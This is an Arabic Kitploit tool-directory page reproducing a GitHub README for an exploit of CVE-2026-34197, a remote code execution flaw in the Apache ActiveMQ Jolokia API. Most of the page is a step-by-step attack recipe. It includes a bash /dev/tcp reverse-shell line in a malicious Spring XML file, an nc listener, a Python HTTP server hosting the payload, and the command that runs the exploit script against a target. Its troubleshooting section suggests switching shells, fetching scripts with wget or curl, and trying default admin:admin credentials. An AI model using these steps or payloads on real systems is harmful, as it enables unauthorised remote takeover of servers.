Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-34197-payload-Apache-ActiveMQ- — نص استغلال ثغرة CVE-2026-34197، يستهدف واجهة برمجة تطبيقات Jolokia في Apache ActiveMQ لتحقيق تنفيذ التعليمات البرمجية عن بُعد عبر تكوين Spring XML خبيث، مع إمكانية فتح قشرة عكسية. | Kitploit
أدوات/GitHubGitHub/xshysjhq/cve-2026-34197-payload-apache-activemq-
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHubxshysjhq/cve-2026-34197-payload-apache-activemq-

CVE-2026-34197-payload-Apache-ActiveMQ-

نص استغلال ثغرة CVE-2026-34197، يستهدف واجهة برمجة تطبيقات Jolokia في Apache ActiveMQ لتحقيق تنفيذ التعليمات البرمجية عن بُعد عبر تكوين Spring XML خبيث، مع إمكانية فتح قشرة عكسية.

عرض المستودع
1منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

دليل إعادة إنتاج ثغرة ActiveMQ Jolokia RCE

يوفر هذا المستودع بيئة إعادة إنتاج وسكربت استغلال لثغرة تنفيذ الأوامر عن بُعد (RCE) بناءً على واجهة Jolokia API المكشوفة (/api/jolokia/) في Apache ActiveMQ. من خلال استدعاء عملية addNetworkConnector، يتم إجبار ActiveMQ على تحليل ملف تكوين Spring XML خبيث تم إنشاؤه عن بُعد، وبالتالي استغلال MethodInvokingFactoryBean لتنفيذ أوامر النظام.

📁 الملفات المضمنة

  • payload.py: السكربت الرئيسي للاستغلال، يرسل طلبات HTTP POST مع اسم Broker ديناميكي.
  • payload.xml: ملف تكوين Spring Bean الخبيث، ويحتوي على حمولة أوامر Reverse Shell.

🛠️ التحضير البيئي

  1. بيئة Python 3
  2. تثبيت التبعيات:
    root@kitploit:~
    pip install requests
    
  • جهاز المهاجم (مثل خادم سحابي): يجب أن يمتلك عنوان IP عام، وأن يكون قادرًا على فتح منفذ خدمة HTTP ومنفذ استماع Reverse Shell.
  • الجهاز الهدف: خدمة ActiveMQ ثغرة (مثل صورة Docker apache/activemq-classic:6.1.0).
  • 🚀 خطوات إعادة الإنتاج

    1. تكوين حمولة الهجوم (payload.xml)

    افتح payload.xml على جهاز المهاجم وابحث عن الجزء التالي:

    root@kitploit:~
    <value>bash -c 'bash -i >& /dev/tcp/عنوان_IP_الخاص_بخادمك_السحابي/15000 0>&1'</value>
    

    استبدل عنوان IP بعنوان IP العام لخادمك السحابي. إذا لم تكن بيئة الهدف تحتوي على bash، فغيّرها إلى sh أو أي طريقة تنفيذ أخرى حسب بيئة الهدف.

    2. تشغيل مستمع Reverse Shell

    افتح طرفية على جهاز المهاجم (الخادم السحابي) واستمع على المنفذ المحدد (مثل 15000):

    root@kitploit:~
    nc -lvvp 15000
    

    ملاحظة: تأكد من أن مجموعة الأمان/جدار الحماية للخادم السحابي قد سمحت بحركة المرور الواردة على منفذ TCP 15000.

    3. تشغيل خدمة HTTP لاستضافة الحمولة

    على جهاز المهاجم (في نفس الدليل الذي يحتوي على payload.xml)، شغّل خادم HTTP ليتمكن الهدف من تنزيل ملف XML:

    root@kitploit:~
    python3 -m http.server 9000
    

    ملاحظة: تأكد أيضًا من أن مجموعة الأمان/جدار الحماية للخادم السحابي قد سمحت بحركة المرور الواردة على منفذ TCP 9000.

    4. تنفيذ سكربت الاستغلال

    قم بتشغيل payload.py على جهازك المحلي (أو جهاز المهاجم). يدعم السكربت تمرير عنوان IP:منفذ ActiveMQ الهدف (-t) وعنوان IP:منفذ استضافة XML على جهاز المهاجم (-a) عبر وسائط سطر الأوامر.

    root@kitploit:~
    python payload.py -t 192.168.0.1:8161 -a 8.8.8.8:9000
    

    بعد التشغيل، سيقوم السكربت تلقائيًا بإنشاء brokerName عشوائي (مثل rce_a1b2c3) لحل مشكلة تعارض الأسماء java.io.IOException : Network Connector could not be registered in JMX بشكل نهائي.

    5. الحصول على Shell

    إذا نجح الاستغلال:

    1. سيشاهد خادم HTTP الخاص بك (python3 -m http.server 9000) سجل طلب GET 200 لـ /payload.xml.
    2. سيستقبل مستمع nc الخاص بك اتصال Reverse Shell من الجهاز الهدف.

    ⚠️ استكشاف الأخطاء الشائعة

    1. تم الحصول على XML بنجاح (HTTP 200)، ولكن لم يتم استلام Shell:
      • السبب أ: مجموعة الأمان للخادم السحابي اعترضت الـ Reverse Shell (حركة المرور الواردة على منفذ 15000 غير مسموحة).
      • السبب ب: لا يحتوي حاوية الهدف على أمر /bin/bash (شائع في الصور الأساسية المصغرة مثل Alpine). يرجى تعديل أمر التنفيذ في payload.xml إلى /bin/sh، أو استخدام سكربت عبر wget/curl ثم تنفيذه.
    2. الهدف يُرجع خطأ 401 Unauthorized:
    • السبب: تتطلب إصدارات ActiveMQ / Jolokia الأحدث توفير مصادقة باسم المستخدم وكلمة المرور.
    • الحل: إذا كانت بيانات الاعتماد الافتراضية، يمكنك إضافة Basic Auth في الطلب (مثل admin:admin).

    🛡️ إخلاء المسؤولية

    هذا السكربت والتعليمات مخصصة فقط للاختبارات الأمنية المصرح بها والتعليم والتعلم. يُحظر تمامًا استخدامها لأي اختبارات غير قانونية غير مصرح بها. يتحمل المستخدم المسؤولية الكاملة عن أفعاله.

    تنزيل الأداة